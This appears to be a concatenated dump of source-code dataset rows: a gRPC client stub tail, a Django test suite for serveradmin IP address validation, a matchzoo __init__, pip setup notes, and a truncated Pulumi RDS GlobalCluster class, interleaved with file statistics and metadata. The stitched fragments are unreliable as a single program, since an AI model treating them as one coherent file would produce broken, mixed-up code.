    EXPERIMENTAL grpc.experimental API; no channel management is needed.
    """

    @staticmethod
    def set_state(request,
            target,
            options=(),
            channel_credentials=None,
            call_credentials=None,
            insecure=False,
            compression=None,
            wait_for_ready=None,
            timeout=None,
            metadata=None):
        # Sends a VmState, receives a Transaction. Generated code: the
        # positional argument order of unary_unary is fixed — do not reorder.
        return grpc.experimental.unary_unary(request, target, '/tira.generated.TiraApplicationService/set_state',
            tira__host__pb2.VmState.SerializeToString,
            tira__host__pb2.Transaction.FromString,
            options, channel_credentials,
            insecure, call_credentials, compression, wait_for_ready, timeout, metadata)

    @staticmethod
    def confirm_creation(request,
            target,
            options=(),
            channel_credentials=None,
            call_credentials=None,
            insecure=False,
            compression=None,
            wait_for_ready=None,
            timeout=None,
            metadata=None):
        # Sends a VmState, receives a Transaction.
        return grpc.experimental.unary_unary(request, target, '/tira.generated.TiraApplicationService/confirm_creation',
            tira__host__pb2.VmState.SerializeToString,
            tira__host__pb2.Transaction.FromString,
            options, channel_credentials,
            insecure, call_credentials, compression, wait_for_ready, timeout, metadata)

    @staticmethod
    def complete_transaction(request,
            target,
            options=(),
            channel_credentials=None,
            call_credentials=None,
            insecure=False,
            compression=None,
            wait_for_ready=None,
            timeout=None,
            metadata=None):
        # Sends a Transaction, receives a Transaction.
        return grpc.experimental.unary_unary(request, target, '/tira.generated.TiraApplicationService/complete_transaction',
            tira__host__pb2.Transaction.SerializeToString,
            tira__host__pb2.Transaction.FromString,
            options, channel_credentials,
            insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
| 44.191964
| 124
| 0.639627
| 2,713
| 29,697
| 6.640251
| 0.046074
| 0.044852
| 0.061671
| 0.062281
| 0.934666
| 0.915293
| 0.894643
| 0.84524
| 0.795337
| 0.782348
| 0
| 0.005166
| 0.269926
| 29,697
| 671
| 125
| 44.257824
| 0.825746
| 0.070647
| 0
| 0.701599
| 1
| 0
| 0.09598
| 0.059174
| 0
| 0
| 0
| 0
| 0
| 1
| 0.071048
| false
| 0
| 0.005329
| 0.031972
| 0.119005
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
13147e9b2e6d8f5574decc7387c9c17373ff7dd0
| 19,829
|
py
|
Python
|
serveradmin/serverdb/tests/test_ip_addr_type.py
|
abdulkadirakin/serveradmin
|
4c2aa478d44464709430bdc98d885e5f47c2359e
|
[
"MIT"
] | null | null | null |
serveradmin/serverdb/tests/test_ip_addr_type.py
|
abdulkadirakin/serveradmin
|
4c2aa478d44464709430bdc98d885e5f47c2359e
|
[
"MIT"
] | null | null | null |
serveradmin/serverdb/tests/test_ip_addr_type.py
|
abdulkadirakin/serveradmin
|
4c2aa478d44464709430bdc98d885e5f47c2359e
|
[
"MIT"
] | null | null | null |
"""Serveradmin - ip_addr_type validation tests
Copyright (c) 2021 InnoGames GmbH
"""
import logging
from django.contrib.auth.models import User
from django.core.exceptions import ValidationError
from django.test.testcases import TransactionTestCase
from faker import Faker
from faker.providers import internet
from serveradmin.dataset import Query, DatasetObject
from serveradmin.serverdb.forms import ServertypeAttributeAdminForm
from serveradmin.serverdb.models import ServertypeAttribute
# TODO: Remove "InternIp" classes when intern_ip is gone.
#
# Once we eliminated the special attribute intern_ip we can get rid of the
# test classes with "InternIp" in name.
class TestIpAddrType(TransactionTestCase):
    """Shared base for ip_addr_type validation tests.

    Loads a user and the servertype fixtures, silences faker's noisy logger,
    and provides a helper to create uncommitted servers with random hostnames.
    """
    fixtures = ['auth_user.json', 'ip_addr_type.json']

    @classmethod
    def setUpClass(cls):
        # Bug fix: the original override did not call super().setUpClass().
        # Django's SimpleTestCase/TransactionTestCase require it — without it
        # class-level setup (overridden settings, class cleanups) is skipped.
        super().setUpClass()
        logging.getLogger('faker').setLevel(logging.ERROR)

    def setUp(self):
        super().setUp()
        self.faker = Faker()
        self.faker.add_provider(internet)

    def _get_server(self, servertype: str) -> DatasetObject:
        """Return a new, uncommitted server of *servertype* with a random hostname."""
        server = Query().new_object(servertype)
        server['hostname'] = self.faker.hostname()
        return server
class TestIpAddrTypeNullForInternIp(TestIpAddrType):
    """Most important tests for ip_addr_type null and intern_ip"""

    def test_server_without_intern_ip(self):
        # A "null" ip_addr_type servertype commits fine without intern_ip.
        obj = self._get_server('null')
        admin = User.objects.first()
        self.assertIsNone(obj.commit(user=admin))

    def test_server_with_intern_ip(self):
        # Supplying intern_ip for a "null" servertype must be rejected.
        obj = self._get_server('null')
        obj['intern_ip'] = '10.0.0.1'
        admin = User.objects.first()
        with self.assertRaises(ValidationError):
            obj.commit(user=admin)
class TestIpAddrTypeNullForInetAttributes(TestIpAddrType):
    """Most important tests for ip_addr_type null and inet attributes"""

    def test_add_inet_attribute_in_admin_panel(self):
        # Attaching an inet attribute to a "null" servertype must fail
        # form validation in the admin panel.
        relation = ServertypeAttribute(
            attribute_id='ip_config', servertype_id='null')
        form = ServertypeAttributeAdminForm(
            data={'attribute': 'ip_config', 'servertype': 'null'},
            instance=relation)
        form.is_valid()
        with self.assertRaises(ValidationError):
            form.clean()
class TestIpAddrTypeHostForInternIp(TestIpAddrType):
    """Most important tests for ip_addr_type host and intern_ip"""

    def test_server_without_value(self):
        # A host requires an intern_ip, so committing without one fails.
        obj = self._get_server('host')
        with self.assertRaises(ValidationError):
            obj.commit(user=User.objects.first())

    def test_server_with_value(self):
        obj = self._get_server('host')
        obj['intern_ip'] = '10.0.0.1/32'
        self.assertIsNone(obj.commit(user=User.objects.first()))

    def test_server_with_invalid_value(self):
        obj = self._get_server('host')
        obj['intern_ip'] = 'nonsense'
        with self.assertRaises(ValidationError):
            obj.commit(user=User.objects.first())

    def test_server_with_ip_network(self):
        # A network range is not an acceptable host address.
        obj = self._get_server('host')
        obj['intern_ip'] = '10.0.0.0/16'
        with self.assertRaises(ValidationError):
            obj.commit(user=User.objects.first())

    def test_server_with_duplicate_intern_ip(self):
        admin = User.objects.first()
        existing = self._get_server('host')
        existing['intern_ip'] = '10.0.0.1/32'
        existing.commit(user=admin)
        clashing = self._get_server('host')
        clashing['intern_ip'] = '10.0.0.1'
        with self.assertRaises(ValidationError):
            clashing.commit(user=admin)

    def test_server_with_duplicate_inet_ip(self):
        admin = User.objects.first()
        existing = self._get_server('host')
        existing['intern_ip'] = '10.0.0.1/32'
        existing['ip_config'] = '10.0.0.2/32'
        existing.commit(user=admin)
        # "Cross" duplicates — an intern_ip colliding with another server's
        # inet attribute — must be denied as well.
        clashing = self._get_server('host')
        clashing['intern_ip'] = '10.0.0.2/32'
        with self.assertRaises(ValidationError):
            clashing.commit(user=admin)

    def test_change_server_hostname(self):
        admin = User.objects.first()
        obj = self._get_server('host')
        obj['intern_ip'] = '10.0.0.1/32'
        obj.commit(user=admin)
        renamed = Query({'hostname': obj['hostname']}, ['hostname'])
        renamed.update(hostname=self.faker.hostname())
        self.assertIsNone(renamed.commit(user=admin))
class TestIpAddrTypeHostForInetAttributes(TestIpAddrType):
    """Most important tests for ip_addr_type host and inet attributes"""

    def test_server_without_value(self):
        # inet attributes are optional; a host commits with intern_ip alone.
        obj = self._get_server('host')
        obj['intern_ip'] = '10.0.0.1/32'
        self.assertIsNone(obj.commit(user=User.objects.first()))

    def test_server_with_value(self):
        obj = self._get_server('host')
        obj['intern_ip'] = '10.0.0.1/32'
        obj['ip_config'] = '10.0.0.2/32'
        self.assertIsNone(obj.commit(user=User.objects.first()))

    def test_server_with_invalid_value(self):
        obj = self._get_server('host')
        obj['intern_ip'] = '10.0.0.1/32'
        obj['ip_config'] = 'nonsense'
        with self.assertRaises(ValidationError):
            obj.commit(user=User.objects.first())

    def test_server_with_ip_network(self):
        # A network range is not an acceptable host inet attribute.
        obj = self._get_server('host')
        obj['intern_ip'] = '10.0.0.1/32'
        obj['ip_config'] = '10.0.0.0/16'
        with self.assertRaises(ValidationError):
            obj.commit(user=User.objects.first())

    def test_server_with_duplicate_inet_attribute(self):
        admin = User.objects.first()
        existing = self._get_server('host')
        existing['intern_ip'] = '10.0.0.1/32'
        existing['ip_config'] = '10.0.0.2/32'
        existing.commit(user=admin)
        clashing = self._get_server('host')
        clashing['intern_ip'] = '10.0.0.3/32'
        clashing['ip_config'] = '10.0.0.2/32'
        with self.assertRaises(ValidationError):
            clashing.commit(user=admin)

    def test_server_overlaps_with_network(self):
        admin = User.objects.first()
        network = self._get_server('network')
        network['intern_ip'] = '10.0.0.5/32'
        network['ip_config'] = '10.0.1.5/32'
        network.commit(user=admin)
        # An ip_address must not collide with the smallest possible network
        obj = self._get_server('host')
        obj['intern_ip'] = '10.0.0.1/32'
        obj['ip_config'] = '10.0.1.5/32'
        self.assertIsNone(obj.commit(user=admin))

    def test_server_with_duplicate_intern_ip(self):
        admin = User.objects.first()
        existing = self._get_server('host')
        existing['intern_ip'] = '10.0.0.1/32'
        existing['ip_config'] = '10.0.0.2/32'
        existing.commit(user=admin)
        # "Cross" duplicates — an inet attribute colliding with another
        # server's intern_ip — must be denied.
        clashing = self._get_server('host')
        clashing['intern_ip'] = '10.0.0.3/32'
        clashing['ip_config'] = '10.0.0.1/32'
        with self.assertRaises(ValidationError):
            clashing.commit(user=admin)

    def test_server_with_duplicate_inet_different_attrs(self):
        admin = User.objects.first()
        existing = self._get_server('host')
        existing['intern_ip'] = '10.0.0.1/32'
        existing['ip_config'] = '10.0.0.2/32'
        existing.commit(user=admin)
        # Duplicates across two different inet attributes are denied too.
        clashing = self._get_server('host')
        clashing['intern_ip'] = '10.0.0.3/32'
        clashing['ip_config_new'] = '10.0.0.2/32'
        with self.assertRaises(ValidationError):
            clashing.commit(user=admin)

    def test_server_with_duplicate_inet_for_loadbalancer(self):
        admin = User.objects.first()
        balancer = self._get_server('loadbalancer')
        balancer['intern_ip'] = '10.0.0.1/32'
        balancer.commit(user=admin)
        # A host must not reuse a loadbalancer's address in an inet attribute.
        clashing = self._get_server('host')
        clashing['intern_ip'] = '10.0.0.2/32'
        clashing['ip_config'] = '10.0.0.1/32'
        with self.assertRaises(ValidationError):
            clashing.commit(user=admin)

    def test_change_server_hostname(self):
        admin = User.objects.first()
        obj = self._get_server('host')
        obj['intern_ip'] = '10.0.0.1/32'
        obj['ip_config'] = '10.0.0.2/32'
        obj.commit(user=admin)
        renamed = Query({'hostname': obj['hostname']}, ['hostname'])
        renamed.update(hostname=self.faker.hostname())
        self.assertIsNone(renamed.commit(user=admin))
class TestIpAddrTypeLoadbalancerForInternIp(TestIpAddrType):
    """Most important tests for ip_addr_type loadbalancer and intern_ip"""

    def test_server_without_value(self):
        # A loadbalancer requires an intern_ip.
        obj = self._get_server('loadbalancer')
        with self.assertRaises(ValidationError):
            obj.commit(user=User.objects.first())

    def test_server_with_value(self):
        obj = self._get_server('loadbalancer')
        obj['intern_ip'] = '10.0.0.1/32'
        self.assertIsNone(obj.commit(user=User.objects.first()))

    def test_server_with_ip_network(self):
        obj = self._get_server('loadbalancer')
        obj['intern_ip'] = '10.0.0.0/16'
        with self.assertRaises(ValidationError):
            obj.commit(user=User.objects.first())

    def test_server_with_duplicate_intern_ip(self):
        # Loadbalancers may legitimately share an address.
        admin = User.objects.first()
        existing = self._get_server('loadbalancer')
        existing['intern_ip'] = '10.0.0.1/32'
        existing.commit(user=admin)
        twin = self._get_server('loadbalancer')
        twin['intern_ip'] = '10.0.0.1/32'
        self.assertIsNone(twin.commit(user=admin))

    def test_change_server_hostname(self):
        admin = User.objects.first()
        obj = self._get_server('loadbalancer')
        obj['intern_ip'] = '10.0.0.1/32'
        obj.commit(user=admin)
        renamed = Query({'hostname': obj['hostname']}, ['hostname'])
        renamed.update(hostname=self.faker.hostname())
        self.assertIsNone(renamed.commit(user=admin))
class TestIpAddrTypeLoadbalancerForInetAttributes(TestIpAddrType):
    """Most important tests for ip_addr_type loadbalancer and inet attrs"""

    def test_server_without_value(self):
        # inet attributes are optional on loadbalancers.
        obj = self._get_server('loadbalancer')
        obj['intern_ip'] = '10.0.0.1/32'
        self.assertIsNone(obj.commit(user=User.objects.first()))

    def test_server_with_value(self):
        obj = self._get_server('loadbalancer')
        obj['intern_ip'] = '10.0.0.1/32'
        obj['ip_config'] = '10.0.0.2/32'
        self.assertIsNone(obj.commit(user=User.objects.first()))

    def test_server_with_ip_network(self):
        obj = self._get_server('loadbalancer')
        obj['intern_ip'] = '10.0.0.1/32'
        obj['ip_config'] = '10.0.0.0/16'
        with self.assertRaises(ValidationError):
            obj.commit(user=User.objects.first())

    def test_server_with_duplicate_inet_attribute(self):
        # Loadbalancers may share addresses, including inet attributes.
        admin = User.objects.first()
        existing = self._get_server('loadbalancer')
        existing['intern_ip'] = '10.0.0.1/32'
        existing['ip_config'] = '10.0.0.2/32'
        existing.commit(user=admin)
        twin = self._get_server('loadbalancer')
        twin['intern_ip'] = '10.0.0.1/32'
        twin['ip_config'] = '10.0.0.2/32'
        self.assertIsNone(twin.commit(user=admin))

    def test_server_with_duplicate_inet_ip(self):
        admin = User.objects.first()
        existing = self._get_server('loadbalancer')
        existing['intern_ip'] = '10.0.0.1/32'
        existing['ip_config'] = '10.0.0.2/32'
        existing.commit(user=admin)
        # "Cross" duplicates from a host against loadbalancer addresses
        # are still denied.
        clashing = self._get_server('host')
        clashing['intern_ip'] = '10.0.0.2/32'
        clashing['ip_config'] = '10.0.0.1/32'
        with self.assertRaises(ValidationError):
            clashing.commit(user=admin)

    def test_server_with_duplicate_inet_different_attrs(self):
        admin = User.objects.first()
        existing = self._get_server('loadbalancer')
        existing['intern_ip'] = '10.0.0.1/32'
        existing['ip_config'] = '10.0.0.2/32'
        existing.commit(user=admin)
        # Between loadbalancers even cross-attribute duplicates are allowed.
        twin = self._get_server('loadbalancer')
        twin['intern_ip'] = '10.0.0.3/32'
        twin['ip_config_new'] = '10.0.0.2/32'
        self.assertIsNone(twin.commit(user=admin))

    def test_change_server_hostname(self):
        admin = User.objects.first()
        obj = self._get_server('loadbalancer')
        obj['intern_ip'] = '10.0.0.1/32'
        obj['ip_config'] = '10.0.0.2/32'
        obj.commit(user=admin)
        renamed = Query({'hostname': obj['hostname']}, ['hostname'])
        renamed.update(hostname=self.faker.hostname())
        self.assertIsNone(renamed.commit(user=admin))
class TestIpAddrTypeNetworkForInternIp(TestIpAddrType):
    """Most important tests for ip_addr_type network and intern_ip"""

    def test_server_without_value(self):
        server = self._get_server('network')
        with self.assertRaises(ValidationError):
            server.commit(user=User.objects.first())

    def test_server_with_value(self):
        server = self._get_server('network')
        server['intern_ip'] = '10.0.0.0/16'
        self.assertIsNone(server.commit(user=User.objects.first()))

    def test_server_with_invalid_value(self):
        # Bug fix: this class tests the "network" ip_addr_type, but the
        # original created a 'host' server here (copy-paste from the host
        # test class), so the network validation path was never exercised.
        server = self._get_server('network')
        server['intern_ip'] = 'nonsense'
        with self.assertRaises(ValidationError):
            server.commit(user=User.objects.first())

    def test_server_with_invalid_network(self):
        server = self._get_server('network')
        server['intern_ip'] = '10.0.0.5/16'  # Invalid: Has host bits set
        with self.assertRaises(ValidationError):
            server.commit(user=User.objects.first())

    def test_server_with_ip_address(self):
        server = self._get_server('network')
        server['intern_ip'] = '10.0.0.1/32'  # Just a very small network
        self.assertIsNone(server.commit(user=User.objects.first()))

    def test_server_network_overlaps(self):
        first = self._get_server('network')
        first['intern_ip'] = '10.0.0.0/30'
        first.commit(user=User.objects.first())
        overlaps = self._get_server('network')
        overlaps['intern_ip'] = '10.0.0.0/28'
        with self.assertRaises(ValidationError):
            overlaps.commit(user=User.objects.first())

    def test_server_network_overlaps_inet(self):
        first = self._get_server('network')
        first['intern_ip'] = '10.0.0.0/30'
        first['ip_config'] = '10.0.1.0/30'
        first.commit(user=User.objects.first())
        # intern_ip may not overlap another network's inet attribute either.
        overlaps = self._get_server('network')
        overlaps['intern_ip'] = '10.0.1.0/28'
        with self.assertRaises(ValidationError):
            overlaps.commit(user=User.objects.first())

    def test_server_network_overlaps_other_servertype(self):
        first = self._get_server('network')
        first['intern_ip'] = '10.0.0.0/30'
        first.commit(user=User.objects.first())
        # A network can overlap with networks of other servertypes
        overlaps = self._get_server('other_network')
        overlaps['intern_ip'] = '10.0.0.0/28'
        self.assertIsNone(overlaps.commit(user=User.objects.first()))

    def test_change_server_hostname(self):
        server = self._get_server('network')
        server['intern_ip'] = '10.0.0.0/30'
        server.commit(user=User.objects.first())
        to_rename = Query({'hostname': server['hostname']}, ['hostname'])
        to_rename.update(hostname=self.faker.hostname())
        self.assertIsNone(to_rename.commit(user=User.objects.first()))
class TestIpAddrTypeNetworkForInetAttributes(TestIpAddrType):
    """Most important tests for ip_addr_type network and inet attrs"""

    def test_server_without_value(self):
        server = self._get_server('network')
        server['intern_ip'] = '10.0.0.0/16'
        self.assertIsNone(server.commit(user=User.objects.first()))

    def test_server_with_value(self):
        server = self._get_server('network')
        server['intern_ip'] = '10.0.0.0/30'
        server['ip_config'] = '10.0.1.0/30'
        self.assertIsNone(server.commit(user=User.objects.first()))

    def test_server_with_invalid_value(self):
        # Bug fix: this class tests the "network" ip_addr_type, but the
        # original created a 'host' server here (copy-paste from the host
        # test class) — for 'host' the /30 intern_ip alone is already
        # invalid, so 'ip_config' validation was not actually exercised.
        server = self._get_server('network')
        server['intern_ip'] = '10.0.0.0/30'
        server['ip_config'] = 'nonsense'
        with self.assertRaises(ValidationError):
            server.commit(user=User.objects.first())

    def test_server_with_invalid_network(self):
        server = self._get_server('network')
        server['intern_ip'] = '10.0.0.0/16'
        server['ip_config'] = '10.0.1.5/28'  # Invalid: Has host bits set
        with self.assertRaises(ValidationError):
            server.commit(user=User.objects.first())

    def test_server_with_ip_address(self):
        server = self._get_server('network')
        server['intern_ip'] = '10.0.0.1/32'  # Just a very small network
        server['ip_config'] = '10.0.1.0/32'  # Just a very small network
        self.assertIsNone(server.commit(user=User.objects.first()))

    def test_server_network_overlaps(self):
        first = self._get_server('network')
        first['intern_ip'] = '10.0.0.0/30'
        first['ip_config'] = '10.0.1.0/30'
        first.commit(user=User.objects.first())
        overlaps = self._get_server('network')
        overlaps['intern_ip'] = '10.0.3.0/30'
        overlaps['ip_config'] = '10.0.1.0/28'
        with self.assertRaises(ValidationError):
            overlaps.commit(user=User.objects.first())

    def test_server_network_overlaps_intern_ip(self):
        first = self._get_server('network')
        first['intern_ip'] = '10.0.0.0/30'
        first.commit(user=User.objects.first())
        # An inet attribute may not overlap another network's intern_ip.
        overlaps = self._get_server('network')
        overlaps['intern_ip'] = '10.0.1.0/28'
        overlaps['ip_config'] = '10.0.0.0/28'
        with self.assertRaises(ValidationError):
            overlaps.commit(user=User.objects.first())

    def test_server_network_is_equal(self):
        first = self._get_server('network')
        first['intern_ip'] = '10.0.0.0/30'
        first['ip_config'] = '10.0.1.0/30'
        first.commit(user=User.objects.first())
        equal = self._get_server('network')
        equal['intern_ip'] = '10.0.2.0/30'
        equal['ip_config'] = '10.0.1.0/30'
        with self.assertRaises(ValidationError):
            equal.commit(user=User.objects.first())

    def test_server_network_overlaps_other_servertype(self):
        first = self._get_server('network')
        first['intern_ip'] = '10.0.0.0/30'
        first['ip_config'] = '10.0.1.0/30'
        first.commit(user=User.objects.first())
        # A network can overlap with networks of other servertypes
        overlaps = self._get_server('other_network')
        overlaps['intern_ip'] = '10.0.0.0/28'
        overlaps['ip_config'] = '10.0.1.0/30'
        self.assertIsNone(overlaps.commit(user=User.objects.first()))

    def test_server_with_duplicate_inet_different_attrs(self):
        server = self._get_server('network')
        server['intern_ip'] = '10.0.0.0/30'
        server['ip_config'] = '10.0.1.0/30'
        server.commit(user=User.objects.first())
        duplicate = self._get_server('network')
        duplicate['intern_ip'] = '10.0.2.0/30'
        duplicate['ip_config_new'] = '10.0.1.0/30'
        with self.assertRaises(ValidationError):
            duplicate.commit(user=User.objects.first())

    def test_change_server_hostname(self):
        server = self._get_server('network')
        server['intern_ip'] = '10.0.0.0/30'
        server['ip_config'] = '10.0.1.0/30'
        server.commit(user=User.objects.first())
        to_rename = Query({'hostname': server['hostname']}, ['hostname'])
        to_rename.update(hostname=self.faker.hostname())
        self.assertIsNone(to_rename.commit(user=User.objects.first()))
| 38.577821
| 75
| 0.649453
| 2,584
| 19,829
| 4.785604
| 0.060372
| 0.016659
| 0.025877
| 0.129064
| 0.870532
| 0.864871
| 0.861718
| 0.846191
| 0.84053
| 0.831959
| 0
| 0.044467
| 0.206112
| 19,829
| 513
| 76
| 38.653021
| 0.741075
| 0.059156
| 0
| 0.815789
| 0
| 0
| 0.151008
| 0
| 0
| 0
| 0
| 0.001949
| 0.136842
| 1
| 0.144737
| false
| 0
| 0.023684
| 0
| 0.197368
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
131ac4acbf211f2e29e13ea5e6c5b822d97ad197
| 302
|
py
|
Python
|
build/lib/matchzoo/utils/__init__.py
|
ChangQF/MatchZoo
|
991bdbad1e5166870fd4051646d7834a337d0709
|
[
"Apache-2.0"
] | 1
|
2019-05-02T10:16:08.000Z
|
2019-05-02T10:16:08.000Z
|
build/lib/matchzoo/utils/__init__.py
|
ChangQF/MatchZoo
|
991bdbad1e5166870fd4051646d7834a337d0709
|
[
"Apache-2.0"
] | null | null | null |
build/lib/matchzoo/utils/__init__.py
|
ChangQF/MatchZoo
|
991bdbad1e5166870fd4051646d7834a337d0709
|
[
"Apache-2.0"
] | 2
|
2018-04-10T11:33:41.000Z
|
2019-07-25T02:10:13.000Z
|
# note:
from .rank_io import read_word_dict
from .rank_io import read_embedding
from .rank_io import read_data_old_version
from .rank_io import read_relation
from .rank_io import read_data
from .rank_io import convert_embed_2_numpy
from .utility import import_class
from .utility import import_object
| 30.2
| 42
| 0.850993
| 52
| 302
| 4.576923
| 0.384615
| 0.201681
| 0.252101
| 0.403361
| 0.453782
| 0.201681
| 0
| 0
| 0
| 0
| 0
| 0.003745
| 0.115894
| 302
| 9
| 43
| 33.555556
| 0.88764
| 0.016556
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
133d4c70bb777b1a6641a31f47df1cacd4214ee1
| 132
|
py
|
Python
|
setup/python_setup.py
|
ioAndzl/Ansible
|
6ded80b455f380b2d251368eaafcef5516e4e654
|
[
"MIT"
] | null | null | null |
setup/python_setup.py
|
ioAndzl/Ansible
|
6ded80b455f380b2d251368eaafcef5516e4e654
|
[
"MIT"
] | null | null | null |
setup/python_setup.py
|
ioAndzl/Ansible
|
6ded80b455f380b2d251368eaafcef5516e4e654
|
[
"MIT"
] | null | null | null |
"""
#windows
sudo python3 -m pip install -U pip
sudo python3 -m pip install -U setuptools
#linux
pip install -U pip setuptools
"""
| 16.5
| 41
| 0.719697
| 21
| 132
| 4.52381
| 0.428571
| 0.315789
| 0.347368
| 0.315789
| 0.484211
| 0.484211
| 0
| 0
| 0
| 0
| 0
| 0.018519
| 0.181818
| 132
| 8
| 42
| 16.5
| 0.861111
| 0.931818
| 0
| null | 0
| null | 0
| 0
| null | 0
| 0
| 0
| null | 1
| null | true
| 0
| 0
| null | null | null | 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b99bacc9e9a629e5397fd57ceb047319259961d8
| 45,525
|
py
|
Python
|
sdk/python/pulumi_aws/rds/global_cluster.py
|
chivandikwa/pulumi-aws
|
19c08bf9dcb90544450ffa4eec7bf6751058fde2
|
[
"ECL-2.0",
"Apache-2.0"
] | 1
|
2021-11-10T16:33:40.000Z
|
2021-11-10T16:33:40.000Z
|
sdk/python/pulumi_aws/rds/global_cluster.py
|
chivandikwa/pulumi-aws
|
19c08bf9dcb90544450ffa4eec7bf6751058fde2
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_aws/rds/global_cluster.py
|
chivandikwa/pulumi-aws
|
19c08bf9dcb90544450ffa4eec7bf6751058fde2
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['GlobalClusterArgs', 'GlobalCluster']
@pulumi.input_type
class GlobalClusterArgs:
    """Input arguments for constructing an RDS `GlobalCluster` resource.

    NOTE: generated by the Pulumi Terraform Bridge (tfgen); prefer fixing the
    generator over hand-editing this class.
    """
    def __init__(__self__, *,
                 global_cluster_identifier: pulumi.Input[str],
                 database_name: Optional[pulumi.Input[str]] = None,
                 deletion_protection: Optional[pulumi.Input[bool]] = None,
                 engine: Optional[pulumi.Input[str]] = None,
                 engine_version: Optional[pulumi.Input[str]] = None,
                 force_destroy: Optional[pulumi.Input[bool]] = None,
                 source_db_cluster_identifier: Optional[pulumi.Input[str]] = None,
                 storage_encrypted: Optional[pulumi.Input[bool]] = None):
        """
        The set of arguments for constructing a GlobalCluster resource.
        :param pulumi.Input[str] global_cluster_identifier: The global cluster identifier.
        :param pulumi.Input[str] database_name: Name for an automatically created database on cluster creation.
        :param pulumi.Input[bool] deletion_protection: If the Global Cluster should have deletion protection enabled. The database can't be deleted when this value is set to `true`. The default is `false`.
        :param pulumi.Input[str] engine: Name of the database engine to be used for this DB cluster. The provider will only perform drift detection if a configuration value is provided. Valid values: `aurora`, `aurora-mysql`, `aurora-postgresql`. Defaults to `aurora`. Conflicts with `source_db_cluster_identifier`.
        :param pulumi.Input[str] engine_version: Engine version of the Aurora global database.
               * **NOTE:** When the engine is set to `aurora-mysql`, an engine version compatible with global database is required. The earliest available version is `5.7.mysql_aurora.2.06.0`.
        :param pulumi.Input[bool] force_destroy: Enable to remove DB Cluster members from Global Cluster on destroy. Required with `source_db_cluster_identifier`.
        :param pulumi.Input[str] source_db_cluster_identifier: Amazon Resource Name (ARN) to use as the primary DB Cluster of the Global Cluster on creation. The provider cannot perform drift detection of this value.
        :param pulumi.Input[bool] storage_encrypted: Specifies whether the DB cluster is encrypted. The default is `false` unless `source_db_cluster_identifier` is specified and encrypted. The provider will only perform drift detection if a configuration value is provided.
        """
        pulumi.set(__self__, "global_cluster_identifier", global_cluster_identifier)
        # Optional arguments are only stored when explicitly provided, so
        # unset values stay absent from the resource's input map.
        if database_name is not None:
            pulumi.set(__self__, "database_name", database_name)
        if deletion_protection is not None:
            pulumi.set(__self__, "deletion_protection", deletion_protection)
        if engine is not None:
            pulumi.set(__self__, "engine", engine)
        if engine_version is not None:
            pulumi.set(__self__, "engine_version", engine_version)
        if force_destroy is not None:
            pulumi.set(__self__, "force_destroy", force_destroy)
        if source_db_cluster_identifier is not None:
            pulumi.set(__self__, "source_db_cluster_identifier", source_db_cluster_identifier)
        if storage_encrypted is not None:
            pulumi.set(__self__, "storage_encrypted", storage_encrypted)

    @property
    @pulumi.getter(name="globalClusterIdentifier")
    def global_cluster_identifier(self) -> pulumi.Input[str]:
        """
        The global cluster identifier.
        """
        return pulumi.get(self, "global_cluster_identifier")

    @global_cluster_identifier.setter
    def global_cluster_identifier(self, value: pulumi.Input[str]):
        pulumi.set(self, "global_cluster_identifier", value)

    @property
    @pulumi.getter(name="databaseName")
    def database_name(self) -> Optional[pulumi.Input[str]]:
        """
        Name for an automatically created database on cluster creation.
        """
        return pulumi.get(self, "database_name")

    @database_name.setter
    def database_name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "database_name", value)

    @property
    @pulumi.getter(name="deletionProtection")
    def deletion_protection(self) -> Optional[pulumi.Input[bool]]:
        """
        If the Global Cluster should have deletion protection enabled. The database can't be deleted when this value is set to `true`. The default is `false`.
        """
        return pulumi.get(self, "deletion_protection")

    @deletion_protection.setter
    def deletion_protection(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "deletion_protection", value)

    @property
    @pulumi.getter
    def engine(self) -> Optional[pulumi.Input[str]]:
        """
        Name of the database engine to be used for this DB cluster. The provider will only perform drift detection if a configuration value is provided. Valid values: `aurora`, `aurora-mysql`, `aurora-postgresql`. Defaults to `aurora`. Conflicts with `source_db_cluster_identifier`.
        """
        return pulumi.get(self, "engine")

    @engine.setter
    def engine(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "engine", value)

    @property
    @pulumi.getter(name="engineVersion")
    def engine_version(self) -> Optional[pulumi.Input[str]]:
        """
        Engine version of the Aurora global database.
        * **NOTE:** When the engine is set to `aurora-mysql`, an engine version compatible with global database is required. The earliest available version is `5.7.mysql_aurora.2.06.0`.
        """
        return pulumi.get(self, "engine_version")

    @engine_version.setter
